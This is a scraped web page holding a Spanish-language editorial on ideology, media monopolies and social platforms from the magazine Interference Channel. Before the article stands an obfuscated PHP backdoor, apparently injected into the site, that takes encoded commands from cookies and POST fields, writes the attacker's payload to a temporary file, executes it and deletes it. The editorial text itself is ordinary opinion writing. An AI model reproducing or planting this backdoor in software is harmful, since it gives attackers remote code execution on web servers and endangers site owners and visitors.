$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> ideología – www.interferencechannel.com

ideología

IDEOLOGIA, queríamos hablar de ideología. Hablar de ideología hoy es supremamente interesante pues vivimos en un mundo y en una sociedad de muchos textos cruzados. La interpretación común de ideología hace décadas era la posibilidad de un sistema binario que se manifestó en la guerra fría, era posible tener una ideología de izquierda o tener una ideología de derecha. Tras la caída del muro y el desmantelamiento de la cultura soviética, las fronteras epistemológicas de la ideología cayeron en una gran crisis.

No solo para las izquierdas, también para las derechas, la caída del sistema binario trajo consigo una crisis dentro de las derechas, ya no había un enemigo, ya no había un Otro, y ese es uno de los peligros en los que cae cualquier institución, establecimiento o gobierno que base su discurso en la antinomia a otro. La regeneración del discurso comenzó a ocurrir en occidente con la era Clinton y la guerra del golfo, los nuevos otros “El terrorismo”, una figura que hereda una fuerte simbología en la tradición del dialogo de occidente con otras culturas. El terrorismo mezclaba esa parte del bárbaro, el otro, el primigenio. Los grandes medios en su mayoría anglófobos fomentaron con todo su poder esa mirada terrible, deshumanizada, anti-cristiana, anti europea de los otros; los árabes, los negros, los musulmanes etc.

Las ideologías contemporáneas existen y son producidas, distribuidas y propagadas de maneras impresionantes. Cuáles son esas nuevas ideologías, ¿nos tocan a nosotros? De una manera suave los grandes medios de interacción actual; Facebook, Google, twitter y demás han logrado ocupar un papel cotidiano en la vida de 2 tercios de la población mundial. Lo que de alguna manera los convierte en instituciones más poderosas que muchos estados, estos medios son los reguladores actuales de nuestro sistema de información. Si bien en cualquier democracia es preocupante que los monopolios económicos ocurran, hoy vivimos el caso de monopolios de información, para el caso global los que nombre y para el caso de Colombia la concentración de los medios en las familias capitalistas más poderosas. Esto deja mucho por pensar a la hora de hablar de censura, libertad de prensa y derecho a la información.

Hay un sinnúmero de ideologías visuales, éticas, y de conducciones que nos golpean a diario: un like, un comentario, una compartida…parecen ser gestos inofensivos de comunicación pero comparten una postura ideologizante; uniformidad social, uniformidad política, uniformidad cultural. Ese es el panorama actual, por eso decidimos hablar de ideología, no debemos aceptar el pesimismo de que otros discursos no son posibles. La revolución en el acceso a la información que trajo Wikileaks e investigaciones como los panama-papers nos muestra que hay otras maneras de entender y participar en la sociedad de la información.

Para esta edición invitamos a Liliana Angulo a participar de la portada, una de las artistas más interesantes del panorama Colombiano, el trabajo de Liliana ilustra muchas de las complejas situaciones de la sociedad Colombiana y la sociedad actual; género, conciencia cultural, conciencia política y otredad.

Nuestra Contra-Portada por el cineasta Simón Mesa Soto, LEIDI ganadora de la Palma de Oro en Cannes.

Los invito a seguir leyéndonos y continuar conectados, Interference, una casa de ideas.♦

 

Diego Aretz es fundador y editor de Interference Channel.

Comments are closed.